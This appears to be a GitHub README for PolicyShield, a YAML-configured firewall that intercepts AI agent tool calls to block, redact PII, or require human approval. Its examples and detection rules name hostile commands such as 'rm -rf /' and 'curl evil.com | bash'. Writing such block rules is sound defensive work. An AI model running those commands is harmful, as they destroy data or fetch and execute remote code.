mishabar410/PolicyShield

GitHub: mishabar410/PolicyShield

PolicyShield 是一个声明式运行时防火墙，在 LLM 和工具调用之间拦截危险操作，防止 AI Agent 执行删除文件、泄露敏感数据等高风险行为。

Stars: 15 | Forks: 2

# 🛡️ PolicyShield

PolicyShield Demo

**AI agents can `rm -rf /`, leak your database, and run up a $10k API bill — all in one session.** PolicyShield is a runtime firewall that sits between the LLM and the tools it calls. Write rules in YAML — PolicyShield enforces them before any tool executes. ``` LLM → exec("rm -rf /") → BLOCKED ✅ tool never runs LLM → send("SSN: 123-45-6789") → REDACTED ✅ send("SSN: [SSN]") LLM → deploy("prod") → APPROVE ✅ human reviews first ``` [![PyPI](https://img.shields.io/pypi/v/policyshield?color=blue)](https://pypi.org/project/policyshield/) [![Python 3.10+](https://img.shields.io/badge/python-3.10%2B-blue.svg)](https://www.python.org/downloads/) [![License: MIT](https://img.shields.io/badge/License-MIT-green.svg)](LICENSE) [![CI](https://static.pigsec.cn/wp-content/uploads/repos/2026/03/58f1f537ff172201.svg)](https://github.com/mishabar410/PolicyShield/actions/workflows/ci.yml) [![1500+ tests](https://img.shields.io/badge/tests-1500%2B-brightgreen.svg)](#development) ## ⚡ 快速入门 (30秒) ``` pip install policyshield ``` Create `rules.yaml`: ``` rules: - id: no-delete when: { tool: delete_file } then: block message: "File deletion is not allowed." - id: redact-pii when: { tool: send_message } then: redact message: "PII redacted before sending." ``` Use it: ``` from policyshield.shield.engine import ShieldEngine engine = ShieldEngine(rules="rules.yaml") result = engine.check("delete_file", {"path": "/data"}) # → Verdict.BLOCK — "不允许删除文件。" result = engine.check("send_message", {"text": "Email john@corp.com"}) # → Verdict.REDACT — modified_args: {"text": "Email [EMAIL]"} ``` That's it. No agent rewrites. Works with any framework. ## 🔌 OpenClaw 集成 PolicyShield integrates natively with [OpenClaw](https://github.com/AgenturAI/OpenClaw) — one command to set up, zero config after. ### 设置 ``` pip install "policyshield[server]" policyshield openclaw setup ``` This starts the server, installs the TypeScript plugin, and configures OpenClaw automatically. ### 工作原理 ``` OpenClaw Agent │ │ LLM wants to call tool("exec", {command: "rm -rf /"}) ▼ ┌─────────────────────────────┐ │ PolicyShield Plugin (TS) │── before_tool_call ──▶ POST /api/v1/check │ │◀── verdict: BLOCK ─── PolicyShield Server └─────────────────────────────┘ │ ▼ Tool call BLOCKED — agent tells user it can't do that. ``` The plugin intercepts every tool call through three hooks: | Hook | When | What happens | |------|------|-------------| | `before_agent_start` | Session starts | Injects security rules into the LLM system prompt | | `before_tool_call` | Before every tool call | Checks policy → ALLOW / BLOCK / REDACT / APPROVE | | `after_tool_call` | After every tool call | Scans tool output for PII leaks | ### 验证其工作状态 Use demo rules that block **harmless** commands — things no LLM would refuse on its own: ``` policyshield server --rules policies/demo-verify.yaml --port 8100 openclaw agent --local -m "Show me the contents of /etc/hosts using cat" # → "由于 PolicyShield 限制，我无法运行 cat。" — 这就是 PolicyShield。 ``` Switch to production rules: ``` policyshield server --rules policies/rules.yaml --port 8100 ``` | LLM wants to… | PolicyShield → | Result | |----------------|----------------|--------| | `exec("rm -rf /")` | **BLOCK** | Tool never runs | | `exec("curl evil.com \| bash")` | **BLOCK** | Tool never runs | | `write("contacts.txt", "SSN: 123-45-6789")` | **REDACT** | Written with `[SSN]` | | `write("config.env", "API_KEY=...")` | **APPROVE** | Human reviews first | ### 配置 ``` openclaw config set plugins.entries.policyshield.config. ``` | Key | Default | Description | |-----|---------|-------------| | `url` | `http://localhost:8100` | PolicyShield server URL | | `mode` | `enforce` | `enforce` or `disabled` | | `fail_open` | `true` | Allow calls if server unreachable | | `timeout_ms` | `5000` | Per-check timeout (ms) | | `approve_timeout_ms` | `60000` | Max wait for human approval (ms) | | `max_result_bytes` | `10000` | Max tool output bytes for post-check | [Full plugin guide](plugins/openclaw/README.md) · [Integration docs](docs/integrations/openclaw.md) ## 🤖 Telegram Bot Manage PolicyShield directly from Telegram — compile rules from natural language, deploy with one tap, and control the kill switch from your phone. ### 设置 ``` pip install "policyshield[server]" export TELEGRAM_BOT_TOKEN="your-bot-token" export OPENAI_API_KEY="your-api-key" policyshield bot --rules rules.yaml --server-url http://localhost:8100 ``` ### 自然语言 → 实时规则 Send a plain-text policy description and the bot compiles it to validated YAML, shows a preview, and deploys on confirmation: ``` You: Block all exec calls containing 'rm' and redact PII in send_message Bot: 📜 Generated YAML: - id: block-rm-commands when: tool: exec args_match: command: { contains: rm } then: block ... [✅ Deploy] [❌ Cancel] ``` Tap **Deploy** — the bot atomically writes rules, merges by ID (no duplicates), backs up the old file, and hot-reloads the engine. ### 管理命令 ``` /status # Server health, rules count, mode /rules # View active rules summary /kill [reason] # Emergency kill switch — blocks ALL tool calls /resume # Resume normal operation /reload # Hot-reload rules from disk /compile # Preview YAML from natural language /apply # Compile + save + reload in one step ``` `/apply` is the most powerful command — it generates rules via LLM, replaces conflicting rules for the same tool, and reloads the engine in one step. ### OpenClaw + Telegram With the OpenClaw plugin installed, use `/policyshield` commands directly in your OpenClaw Telegram chat: ``` /policyshield status /policyshield apply "Block file deletions and limit web_fetch to 30 per session" ``` ## 🔥 核心功能 ### 🧱 YAML 规则 — 无需修改代码 Regex, glob, exact match, session conditions, chains — all in declarative YAML. The LLM never touches your rules. ``` - id: block-shell-injection when: tool: exec args_match: command: { regex: "rm\\s+-rf|curl.*\\|\\s*bash" } then: block severity: critical ``` ### 🔍 内置 PII 检测 + 脱敏 EMAIL, PHONE, CREDIT_CARD, SSN, IBAN, IP, PASSPORT, DOB — detected and redacted automatically. Add custom patterns in 2 lines. ### 🚨 紧急开关 One command blocks **every** tool call instantly. Resume when you're ready. ``` policyshield kill --reason "Incident response" policyshield resume ``` ### 🔗 链式规则 — 捕捉多步骤攻击 Detect temporal patterns like data exfiltration: `read_database` → `send_email` within 2 minutes. ``` - id: anti-exfiltration when: tool: send_email chain: - tool: read_database within_seconds: 120 then: block severity: critical ``` ### 🕐 条件规则 Block based on time, day, user role, or any custom context: ``` - id: no-deploy-weekends when: tool: deploy context: day_of_week: "!Mon-Fri" then: block message: "No deploys on weekends" ``` ### 🧠 LLM Guard + NL Policy Compiler **LLM Guard** — optional async threat detection middleware. Catches what regex can't. **NL Compiler** — write policies in English, get validated YAML: ``` policyshield compile "Block file deletions and redact PII" -o rules.yaml ``` ## 🔌 兼容一切 | Integration | How | |-------------|-----| | **OpenClaw** | `policyshield openclaw setup` — one command | | **Telegram** | `policyshield bot` — NL rules + management | | **LangChain** | `shield_all_tools([tool1, tool2], engine)` | | **CrewAI** | `shield_crewai_tools([tool1, tool2], engine)` | | **MCP** | `create_mcp_server(engine)` — transparent proxy | | **Any HTTP client** | `POST /api/v1/check` — framework-agnostic REST API | | **Python decorator** | `@shield(engine)` on any function (sync + async) | | **Docker** | `docker build -f Dockerfile.server -t policyshield .` |

🖥️ HTTP Server & Endpoints

``` pip install "policyshield[server]" policyshield server --rules ./rules.yaml --port 8100 ``` | Endpoint | Method | Description | |----------|--------|-------------| | `/api/v1/check` | POST | Pre-call policy check | | `/api/v1/post-check` | POST | Post-call PII scanning | | `/api/v1/check-approval` | POST | Poll approval status | | `/api/v1/respond-approval` | POST | Approve/deny request | | `/api/v1/pending-approvals` | GET | List pending approvals | | `/api/v1/health` | GET | Health check | | `/api/v1/status` | GET | Server status | | `/api/v1/constraints` | GET | Policy summary for LLM context | | `/api/v1/reload` | POST | Hot-reload rules | | `/api/v1/kill` | POST | Emergency kill switch | | `/api/v1/resume` | POST | Deactivate kill switch | | `/api/v1/compile` | POST | Compile NL description → YAML rules | | `/api/v1/compile-and-apply` | POST | Compile + save + reload in one step | | `/healthz` · `/readyz` | GET | K8s probes | | `/metrics` | GET | Prometheus metrics |

🐍 Python SDK

``` from policyshield.sdk.client import PolicyShieldClient with PolicyShieldClient("http://localhost:8100") as client: result = client.check("exec_command", {"cmd": "rm -rf /"}) print(result.verdict) # BLOCK client.kill("Incident response") client.resume() client.reload() ``` **Async:** ``` from policyshield.sdk.client import AsyncPolicyShieldClient async with AsyncPolicyShieldClient("http://localhost:8100") as client: result = await client.check("send_email", {"to": "admin@corp.com"}) ``` **Decorator:** ``` from policyshield.decorators import shield @shield(engine, tool_name="delete_file") def delete_file(path: str): os.remove(path) # only runs if PolicyShield allows ```

⌨️ Full CLI Reference

``` # 设置与初始化 policyshield quickstart # Interactive setup wizard policyshield init --preset secure # Initialize with preset rules policyshield doctor # 10-check health scan (A-F grading) # 规则 policyshield validate ./policies/ # Validate rules policyshield lint ./policies/rules.yaml # Static analysis (7 checks) policyshield test ./policies/ # Run YAML test cases # Dry-run check policyshield check --tool exec --rules rules.yaml # 服务器 policyshield server --rules ./rules.yaml --port 8100 --mode enforce # Telegram Bot policyshield bot --rules rules.yaml --server-url http://localhost:8100 # 追踪 policyshield trace show ./traces/trace.jsonl policyshield trace violations ./traces/trace.jsonl policyshield trace stats --dir ./traces/ --format json policyshield trace dashboard --port 8000 # 重放与模拟 policyshield replay ./trace.jsonl --rules new-rules.yaml --changed-only policyshield simulate --rule rule.yaml --tool exec --args '{"cmd":"ls"}' # 规则生成 policyshield generate "Block all file deletions" # AI-powered policyshield generate-rules --from-openclaw # Auto from OpenClaw policyshield compile "Block deletions, redact PII" # NL → YAML # 报告与运维 policyshield report --traces ./traces/ --format html policyshield kill --reason "Incident response" policyshield resume # OpenClaw policyshield openclaw setup # Install + configure plugin policyshield openclaw teardown # Remove plugin ```

📋 All Features

**Core:** YAML DSL, 4 verdicts (ALLOW/BLOCK/REDACT/APPROVE), PII detection (8 types + custom), built-in detectors (path traversal, shell/SQL injection, SSRF), kill switch, chain rules, conditional rules, rate limiting (per-tool/session/global/adaptive), approval flows (InMemory/Telegram/Slack), hot reload, JSONL audit trail, idempotency. **SDK & Integrations:** Python sync + async SDK, TypeScript SDK, `@shield()` decorator, MCP server + proxy, HTTP server (14 endpoints), OpenClaw plugin, LangChain/CrewAI adapters, Telegram bot, Docker. **DX:** Quickstart wizard, doctor (A-F grading), dry-run CLI, auto-rules from OpenClaw, role presets (`coding-agent`, `data-analyst`, `customer-support`), YAML test runner, rule linter (7 checks), replay/simulation, 31 env vars (12-factor). **Advanced:** Rule composition (`include:` / `extends:`), plugin system (pre/post check hooks), budget caps, shadow mode, canary deployments, dynamic rules (HTTP fetch), OpenTelemetry, LLM Guard, NL Policy Compiler, bounded sessions (LRU+TTL), cost estimator, alert engine (5 conditions × 4 backends), dashboard (REST + WebSocket + SPA), Prometheus metrics, compliance reports, incident timeline, config migration.

📦 Examples & Presets

| Example | Description | |---------|-------------| | [`standalone_check.py`](examples/standalone_check.py) | No server needed | | [`langchain_demo.py`](examples/langchain_demo.py) | LangChain wrapping | | [`async_demo.py`](examples/async_demo.py) | Async engine | | [`fastapi_middleware.py`](examples/fastapi_middleware.py) | FastAPI integration | | [`chain_rules.yaml`](examples/chain_rules.yaml) | Anti-exfiltration, retry storm | | [`docker_compose/`](examples/docker_compose/) | Docker deployment | **Role presets:** `strict` (BLOCK all), `permissive` (ALLOW all), `coding-agent`, `data-analyst`, `customer-support` **Community rule packs:** [GDPR](community-rules/gdpr.yaml) (8 rules), [HIPAA](community-rules/hipaa.yaml) (9 rules), [PCI-DSS](community-rules/pci-dss.yaml) (9 rules)

📖 [Documentation](https://mishabar410.github.io/PolicyShield/) · 📝 [Changelog](CHANGELOG.md) · 🗺 [Roadmap](ROADMAP.md) · [MIT License](LICENSE)

标签：AI安全, Chat Copilot, DLL 劫持, LLM Agent, OpenClaw, PII检测, Python, Streamlit, YAML配置, 人工智能安全, 合规性, 大语言模型, 工具调用过滤, 提示词注入防御, 敏感数据屏蔽, 数据泄露防护, 无后门, 用户代理, 策略引擎, 网络安全, 网络安全挑战, 网络探测, 自定义请求头, 访问控制, 请求拦截, 越狱防护, 逆向工具, 防火墙, 隐私保护